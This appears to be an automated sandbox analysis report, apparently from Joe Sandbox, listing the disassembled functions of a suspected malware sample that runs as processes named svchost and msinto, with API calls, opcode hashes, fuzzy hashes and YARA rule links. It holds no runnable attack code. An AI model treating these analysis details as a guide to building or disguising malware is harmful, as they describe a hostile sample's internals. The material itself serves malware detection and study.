                                                            Similarity
                                                            • API ID: Thread$CreatePriority__vswprintf_c_l
                                                            • String ID: CreateThread failed
                                                            • API String ID: 2655393344-3849766595
                                                            • Opcode ID: 59add5815b3132101e057256cc6997c40d7b92f4f04bae7c5dbd9f70ea2738ea
                                                            • Instruction ID: 64a1cd8a6e51dc5351010e29710cd22528f5f5ea86f5869e4a8afb66235dba9d
                                                            • Opcode Fuzzy Hash: 59add5815b3132101e057256cc6997c40d7b92f4f04bae7c5dbd9f70ea2738ea
                                                            • Instruction Fuzzy Hash: C0012BB534070D7BDB305F6C9C4AB767358FB50751F20002EF646D2280CBA1A8C54221
                                                            Function 00831316 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0083E2E8: _swprintf.LIBCMT ref: 0083E30E
                                                              • Part of subcall function 0083E2E8: _strlen.LIBCMT ref: 0083E32F
                                                              • Part of subcall function 0083E2E8: SetDlgItemTextW.USER32(?,0086E274,?), ref: 0083E38F
                                                              • Part of subcall function 0083E2E8: GetWindowRect.USER32(?,?), ref: 0083E3C9
                                                              • Part of subcall function 0083E2E8: GetClientRect.USER32(?,?), ref: 0083E3D5
                                                            • GetDlgItem.USER32(00000000,00003021), ref: 0083135A
                                                            • SetWindowTextW.USER32(00000000,008635F4), ref: 00831370
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                                            • String ID: 0
                                                            • API String ID: 2622349952-4108050209
                                                            • Opcode ID: dada6cc0488eea4dd6472ac03be233be1c54210ec89dccf8a02fa82172c68359
                                                            • Instruction ID: 35861bae6d78328d707425af737ac94e8065d0bed165a7723d69a87edeb2214c
                                                            • Opcode Fuzzy Hash: dada6cc0488eea4dd6472ac03be233be1c54210ec89dccf8a02fa82172c68359
                                                            • Instruction Fuzzy Hash: E0F03C30104288AADF151F65C80DAEA3B59FF84748F088219FD49D5AA1CB78CA98AB90
                                                            Function 00840FE4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • WaitForSingleObject.KERNEL32(?,000000FF,00841206,?), ref: 00840FEA
                                                            • GetLastError.KERNEL32(?), ref: 00840FF6
                                                              • Part of subcall function 00836C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00836C54
                                                            Strings
                                                            • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00840FFF
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                                            • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                            • API String ID: 1091760877-2248577382
                                                            • Opcode ID: 0e7e014fd5c37389d03be6ed8de8f407874c4294d6192f7b060ce819a1ce7185
                                                            • Instruction ID: df85a440c64fa8d60abfd425b7b880113d69574080a9e3bb741b4c7605ebf49e
                                                            • Opcode Fuzzy Hash: 0e7e014fd5c37389d03be6ed8de8f407874c4294d6192f7b060ce819a1ce7185
                                                            • Instruction Fuzzy Hash: 5FD02E725089217ACE10332CAC0AC6F3C04FB62331F22A704F138E03E6CB2949A662D3
                                                            Function 0083E29E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(00000000,?,0083DA55,?), ref: 0083E2A3
                                                            • FindResourceW.KERNEL32(00000000,RTL,00000005,?,0083DA55,?), ref: 0083E2B1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: FindHandleModuleResource
                                                            • String ID: RTL
                                                            • API String ID: 3537982541-834975271
                                                            • Opcode ID: aca9f40f8e0f3da92ee715df37c57037b0ced07011d32d61b8eb73c5a243b4dc
                                                            • Instruction ID: c324250b63558cf32f042cb83ce4400b2b8b3f8c4e0b268fb3dc02f3c888025b
                                                            • Opcode Fuzzy Hash: aca9f40f8e0f3da92ee715df37c57037b0ced07011d32d61b8eb73c5a243b4dc
                                                            • Instruction Fuzzy Hash: 1CC01231241B2066EA3027A46C0DB836A98BB00B16F0A1448F281EE2D1DAF9C98886E1

                                                            Execution Graph

                                                            Execution Coverage:10.4%
                                                            Dynamic/Decrypted Code Coverage:100%
                                                            Signature Coverage:0%
                                                            Total number of Nodes:3
                                                            Total number of Limit Nodes:0
                                                            execution_graph 7108 7ffd34c9cac1 7110 7ffd34c9cb36 QueryFullProcessImageNameA 7108->7110 7111 7ffd34c9cc84 7110->7111

                                                            Executed Functions

                                                            Function 00007FFD348A0D4C Relevance: 1.5, Strings: 1, Instructions: 263COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.2404883450.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_7ffd348a0000_msinto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 5Z_H
                                                            • API String ID: 0-3267294416
                                                            • Opcode ID: 9572d492c200d6634ae14549340cb217e995b387b890a74857aeb6457210ffcb
                                                            • Instruction ID: 74d00bc151e67a06939f42eb6816cc1ad7103d9d442703793e13af4343590428
                                                            • Opcode Fuzzy Hash: 9572d492c200d6634ae14549340cb217e995b387b890a74857aeb6457210ffcb
                                                            • Instruction Fuzzy Hash: 2891D065A09A894FE799DF6888753E9BFF1FF56310F0401BEC149E72D6CAB92811C350
                                                            Function 00007FFD34C9CAC1 Relevance: 1.8, APIs: 1, Instructions: 258COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.2409179094.00007FFD34C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34C90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_7ffd34c90000_msinto.jbxd
                                                            Similarity
                                                            • API ID: FullImageNameProcessQuery
                                                            • String ID:
                                                            • API String ID: 3578328331-0
                                                            • Opcode ID: 103354322dddd460682f9f5e7577515848546292b5d036cab94208bd339dc20b
                                                            • Instruction ID: 64bd7fd9b035d26b2c45f28757b0bc37971134f9178bc1be76d83717420548be
                                                            • Opcode Fuzzy Hash: 103354322dddd460682f9f5e7577515848546292b5d036cab94208bd339dc20b
                                                            • Instruction Fuzzy Hash: D7719230608A4D8FDB69DF28C8957F937E1FB5A311F14422FE84EC7292CB7499458B81
                                                            Function 00007FFD348A07D0 Relevance: 1.4, Strings: 1, Instructions: 104COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.2404883450.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_7ffd348a0000_msinto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: HAy4
                                                            • API String ID: 0-3522526771
                                                            • Opcode ID: a427ab13864f14b98dd6a39544850d04bb5ee5ea11312724d99568a853c249ad
                                                            • Instruction ID: a7948eb87be0f0529a7c3fba2485c21e84a37e0bc2bc83d6a211baf54d2857f8
                                                            • Opcode Fuzzy Hash: a427ab13864f14b98dd6a39544850d04bb5ee5ea11312724d99568a853c249ad
                                                            • Instruction Fuzzy Hash: A8313821A0E6890FE7969B3888751E93FB0EF87310F0945F7D549C70E3D92CA90697A2
                                                            Function 00007FFD348A08D0 Relevance: .2, Instructions: 158COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.2404883450.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_7ffd348a0000_msinto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e12258503fae9b1bb44f031767b4f47180ddcd71f4e858505015f75aab86b176
                                                            • Instruction ID: e98cb5305390b606c661ac40db9b0b4a454be4e98440665143f07e4671b34f4a
                                                            • Opcode Fuzzy Hash: e12258503fae9b1bb44f031767b4f47180ddcd71f4e858505015f75aab86b176
                                                            • Instruction Fuzzy Hash: 3C410322B0CA650FE754B7FCA0B92FAB791DF86325F0804BBD24DC7193DD68B8418284
                                                            Function 00007FFD348A090D Relevance: .1, Instructions: 149COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.2404883450.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_7ffd348a0000_msinto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: dafa30ee8224e5f4de06706f99636ddb9ae0f6039c83c9268fc3380252394cfa
                                                            • Instruction ID: 853425a6991960b4ec9a034298c254182bb5c168bf11c6e48dc894a75c03744c
                                                            • Opcode Fuzzy Hash: dafa30ee8224e5f4de06706f99636ddb9ae0f6039c83c9268fc3380252394cfa
                                                            • Instruction Fuzzy Hash: 3F41F422B0CA651FE764B7FC60AA6F9B7D5DF86321F08447BD14DC7193DD68B8418284
                                                            Function 00007FFD348A0908 Relevance: .1, Instructions: 118COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.2404883450.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_7ffd348a0000_msinto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: dfa560b8674232b036245963f28da186a8f4c138d6b1b6fd382aa6a4ebc34706
                                                            • Instruction ID: b95c0fddba714cae56ebba2eec607c2e8af1ad826bfc272167ce991942ba75b3
                                                            • Opcode Fuzzy Hash: dfa560b8674232b036245963f28da186a8f4c138d6b1b6fd382aa6a4ebc34706
                                                            • Instruction Fuzzy Hash: 26210A3170DC184FE7A8EB0CE889DB973D1EF9A32170105BAE58EC7125E951EC8287C1
                                                            Function 00007FFD348A4525 Relevance: .1, Instructions: 96COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.2404883450.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_7ffd348a0000_msinto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 07ef623e43e81f330622f2f54a03eb5d4cd6641417e12caa4f84606802083404
                                                            • Instruction ID: c72533d5cb17247a87bb1c533d6d5b87f0d4f81b654bc3262004b07077e8c00b
                                                            • Opcode Fuzzy Hash: 07ef623e43e81f330622f2f54a03eb5d4cd6641417e12caa4f84606802083404
                                                            • Instruction Fuzzy Hash: C3312020F0A91A4FEFD4EB2484A57B862D2FF5B700F5400B5D60ED7292DEACAC40A711
                                                            Function 00007FFD348A116D Relevance: .1, Instructions: 94COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.2404883450.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_7ffd348a0000_msinto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 10ad3d9aa56dd1a78469b084a337dccb68c5bf8590f568808efcc1c33430774a
                                                            • Instruction ID: 97bfa482e374b8a23f3a93eba17aedd33ce9833bda45c1aa327186a26c1c9158
                                                            • Opcode Fuzzy Hash: 10ad3d9aa56dd1a78469b084a337dccb68c5bf8590f568808efcc1c33430774a
                                                            • Instruction Fuzzy Hash: C831B431A0D64A8FDB85EB68C8A5AF977F0FF5A300F0545BAC009D7193DE79A841CB50
                                                            Function 00007FFD348A0998 Relevance: .1, Instructions: 93COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.2404883450.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_7ffd348a0000_msinto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 56549c86fb1decb196d692c2c9fafa73a034b9a3e1d50eb89524c2d29af2bf4c
                                                            • Instruction ID: 45a6bd31bb409fe855f1759a9b5b4a8865b5c3c4f4ed2b9381a8e8e06b2d3e1a
                                                            • Opcode Fuzzy Hash: 56549c86fb1decb196d692c2c9fafa73a034b9a3e1d50eb89524c2d29af2bf4c
                                                            • Instruction Fuzzy Hash: 3D21FC20B199590FE7D8E76C54A96B9B6C2DB9A311F1000BDE50DC33D3DD6CAC418291
                                                            Function 00007FFD348A0C25 Relevance: .1, Instructions: 85COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.2404883450.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_7ffd348a0000_msinto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 236cf25825770f7b006d839e398e51a1b2dec7fb2fa10cd83ca1c68d0ad90e9a
                                                            • Instruction ID: fdab3cff6af208bbab6acc08e01a21042412c9e62ed33bb1b25778f1a9e79b67
                                                            • Opcode Fuzzy Hash: 236cf25825770f7b006d839e398e51a1b2dec7fb2fa10cd83ca1c68d0ad90e9a
                                                            • Instruction Fuzzy Hash: 75212936F0E6599FE712ABB898A10EC7B60EF43321F0441B3D248CB083E97C65469791
                                                            Function 00007FFD348A56F0 Relevance: .1, Instructions: 56COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.2404883450.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_7ffd348a0000_msinto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 035cbd0902bfb01be1e36e6b0b41980d2e49b7714cd7a2026629ddaf6ef58949
                                                            • Instruction ID: 5ae8bdd446a85fe2189935f1c4cdaba0bb0ca342cf27c3d1c688d2c198bd0680
                                                            • Opcode Fuzzy Hash: 035cbd0902bfb01be1e36e6b0b41980d2e49b7714cd7a2026629ddaf6ef58949
                                                            • Instruction Fuzzy Hash: E4114235A09A09CFDBD4DB04C494BAD77F2EB59311F15416AD00EE7290CB79A9C1DF44
                                                            Function 00007FFD348A0C38 Relevance: .1, Instructions: 56COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.2404883450.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_7ffd348a0000_msinto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f9eb178c4f6badb0614f9604599b8b76714e9d6950d87abe70f2f50f59437142
                                                            • Instruction ID: d7e20ef46caded103447866c82c7d0a7a415cef8aa2d7700b4657cfbc0ef01d9
                                                            • Opcode Fuzzy Hash: f9eb178c4f6badb0614f9604599b8b76714e9d6950d87abe70f2f50f59437142
                                                            • Instruction Fuzzy Hash: F0110231F0E6899FE742DFA888A11EC7BB0EF43310F0440B2C244DB182E97C660A97A0
                                                            Function 00007FFD348A0C40 Relevance: .0, Instructions: 50COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.2404883450.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_7ffd348a0000_msinto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 35ebce3d15490930016013e936b75ba7b1a9d08090cbd0839bb9e25f21e05828
                                                            • Instruction ID: 3c6f25c25252c45da23a75aba0579235deb93d5d0d959b0794446366e4bf13fb
                                                            • Opcode Fuzzy Hash: 35ebce3d15490930016013e936b75ba7b1a9d08090cbd0839bb9e25f21e05828
                                                            • Instruction Fuzzy Hash: 59110431F0E6899FE742DF6888A01DD7BB0EF43310F0440B6C144DB182D97C660A9790
                                                            Function 00007FFD348A0C50 Relevance: .0, Instructions: 39COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.2404883450.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_7ffd348a0000_msinto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: feff8a622c2c9acc54c52f77033101e73e198fc650f9c086de1b1a29d46fbf84
                                                            • Instruction ID: 3d479ace959c3510bd325deb31f905d4d0e3b3a52c4ddb87f263459dc55489e5
                                                            • Opcode Fuzzy Hash: feff8a622c2c9acc54c52f77033101e73e198fc650f9c086de1b1a29d46fbf84
                                                            • Instruction Fuzzy Hash: 08018F34E0E3899FEB52DFA888A01AD7FB0EF13310F1441F6D144DB182EA7C6A459791
                                                            Function 00007FFD348A4635 Relevance: .0, Instructions: 35COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.2404883450.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_7ffd348a0000_msinto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f08ae8a61e808b57d8b254018537c510135bb68dfaf9b0d31c658a02ae44dada
                                                            • Instruction ID: 35ae8fa9d6c8ca725658f27ceb8a00f2924cf5f348593faf5c6130b85e78c64a
                                                            • Opcode Fuzzy Hash: f08ae8a61e808b57d8b254018537c510135bb68dfaf9b0d31c658a02ae44dada
                                                            • Instruction Fuzzy Hash: 1AF0EC30A1A61E8EFF95EF40C8E47F87361FB96701F5401B5C60AD72A1DFAC69809A50
                                                            Function 00007FFD348A45BC Relevance: .0, Instructions: 30COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.2404883450.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_7ffd348a0000_msinto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 508c79c546175c05d1438037ebf3d7b8e117274a0c6f02f7415c70eb6e0241bd
                                                            • Instruction ID: 2c116b0a786b3751e807e9b052c8c1b01c4b9cef602d57735dfd3764030640b0
                                                            • Opcode Fuzzy Hash: 508c79c546175c05d1438037ebf3d7b8e117274a0c6f02f7415c70eb6e0241bd
                                                            • Instruction Fuzzy Hash: E6F05E30B0A60A4EFFD4EB00C8E46F82391FF57700F100175CA4ED72A2DEAC69409650
                                                            Function 00007FFD348A06F2 Relevance: .0, Instructions: 24COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.2404883450.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_7ffd348a0000_msinto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d20051572f8ab65bbc61363d2ae0d262ba6f41f2c51e5cea1e06876f8bc17ab4
                                                            • Instruction ID: 66c75b40299f0f4d489785dc1076b92980e8cdbe53304afc3d67fa0fc5274f24
                                                            • Opcode Fuzzy Hash: d20051572f8ab65bbc61363d2ae0d262ba6f41f2c51e5cea1e06876f8bc17ab4
                                                            • Instruction Fuzzy Hash: A0E04F51E4F78A06E6822ABD19F60AD6A541F93218F9C00B2D64DD6193B8CE30992677
                                                            Function 00007FFD348A2E4C Relevance: .0, Instructions: 22COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.2404883450.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_7ffd348a0000_msinto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1a23117acbdbf760f00117a47373b727a4dbe263c9162e5cb3da5fb5f26b28c5
                                                            • Instruction ID: 190f0a8a213a581b0c04eb4b02a759318e19f9084cd2505f1fee32b50ff71a4e
                                                            • Opcode Fuzzy Hash: 1a23117acbdbf760f00117a47373b727a4dbe263c9162e5cb3da5fb5f26b28c5
                                                            • Instruction Fuzzy Hash: 81E01261F0E41646FBD4A754D4A07A96255DB49310F180078DB4ED33C1CD6CAD409B16
                                                            Function 00007FFD348AF1C8 Relevance: .0, Instructions: 21COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.2404883450.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_7ffd348a0000_msinto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 328f2719d672d29b5b68c311e6b4c6e7d26fcaa1a2469217ebe8a8a5fa804afd
                                                            • Instruction ID: 26a0e938c5b159bc7f38b261189ecc31e011f82e68bebc4e65eeb4eba0f1ebf6
                                                            • Opcode Fuzzy Hash: 328f2719d672d29b5b68c311e6b4c6e7d26fcaa1a2469217ebe8a8a5fa804afd
                                                            • Instruction Fuzzy Hash: 44D05E34A249084BCB08EF39C88E535B3D1FB99206F99C1BA944ED66B0CF6998815741
                                                            Function 00007FFD348A0B95 Relevance: .0, Instructions: 19COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.2404883450.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_7ffd348a0000_msinto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 01128ebb3b7ec0b5151aa04a1c0580f2a8b486cc2299b51aaf45d3f3ed769e8f
                                                            • Instruction ID: 8acf1c5b332099b2246399b80d3ac6c9f554998e3a77f5c7c8a16b79e6bbc71c
                                                            • Opcode Fuzzy Hash: 01128ebb3b7ec0b5151aa04a1c0580f2a8b486cc2299b51aaf45d3f3ed769e8f
                                                            • Instruction Fuzzy Hash: C1D0A930629A4E8FDA40B738C89A8247BA0FF0F211FC914E1E008C71A2D60888A9C700
                                                            Function 00007FFD348A06A5 Relevance: .0, Instructions: 13COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.2404883450.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_7ffd348a0000_msinto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 589dbee506358a5312d3161b8f8fc4f4950a70e8b28fdc2b1e26bdaeadf0b41a
                                                            • Instruction ID: 034f2f9127c1509428e41563de5c0a43d5071b4447ae523b29c7ff65ba71b807
                                                            • Opcode Fuzzy Hash: 589dbee506358a5312d3161b8f8fc4f4950a70e8b28fdc2b1e26bdaeadf0b41a
                                                            • Instruction Fuzzy Hash: C6C04C05F5B61F01B8957B6E58E60ACA1405BD7714FDD1172D74DD00D1ACCD20D92177
                                                            Function 00007FFD348A12B0 Relevance: .0, Instructions: 12COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.2404883450.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_7ffd348a0000_msinto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 77ad4d031cf475bb47d04fe4c5aaf9db597bb29844311aba93be73394404c860
                                                            • Instruction ID: b000458af23801af5d7a1d6781a6c87292a975ce16cbf5cab5fe5ffb1a1b6739
                                                            • Opcode Fuzzy Hash: 77ad4d031cf475bb47d04fe4c5aaf9db597bb29844311aba93be73394404c860
                                                            • Instruction Fuzzy Hash: 95C08C305118098FC988EB28C88480433A0FB0A300BC10090E408C7170D25ADCC1D781
                                                            Function 00007FFD348A4C37 Relevance: .0, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.2404883450.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_7ffd348a0000_msinto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 03bc1bc54f1df904a32daa459cbe5720fadee2cf3ca2283467bbeadafdb049e8
                                                            • Instruction ID: 50f83a0cb2625f60f080dfceb6a9bc0e0b7bec0aff434059967039625f7f6b4d
                                                            • Opcode Fuzzy Hash: 03bc1bc54f1df904a32daa459cbe5720fadee2cf3ca2283467bbeadafdb049e8
                                                            • Instruction Fuzzy Hash: A8C08C00F0C82A82F2E5228400302BD04064F84301F484034E20DE73CACD6C2D0102C6
                                                            Function 00007FFD348A06C8 Relevance: .0, Instructions: 8COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
